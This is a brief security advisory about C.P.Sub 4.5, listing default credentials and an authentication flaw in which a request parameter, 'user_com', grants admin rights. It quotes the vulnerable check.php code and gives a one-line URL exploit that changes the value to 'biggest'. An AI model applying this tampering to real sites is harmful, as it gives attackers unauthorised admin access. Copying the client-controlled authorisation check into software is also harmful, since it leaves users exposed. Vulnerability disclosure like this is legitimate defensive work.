C.P.Sub Multiple Default Credentials Vulnerability

Summary

C.P.Sub Multiple suffers from default credentials vulnerability.

Credit:

The information has been provided by Chako.


Details

Vulnerable Systems:
 * C.P.Sub 4.5

By default, C.P.Sub installs with multiple unspecified default user credentials (username/password combination). These accounts allow remote attackers to trivially access the program or system and gain privileged access.

Improper Authentication:

Description:
C.P.Sub <= v4.5 use ‘user_com=’ parameter to identify if the user has admin privilege.
Therefore an attacker could simply change the value for ‘user_com=’ parameter to gain admin privilege.

/check.php (LINE: 36-44)

if($_GET[user_com] != ”)
{
$user_com = $_GET[user_com];
}elseif($_POST[user_com] != ”)
{
$user_com = $_POST[user_com];
}
if($user_com == ‘biggest’)
{

Exploit:

change
http://Example_Target/info.php?cookie=yes&user_com=second

to
http://Example_Target/info.php?cookie=yes&user_com=biggest

Disclosure Timeline:
Disclosure Date :2013-07-01

Categories: Exploits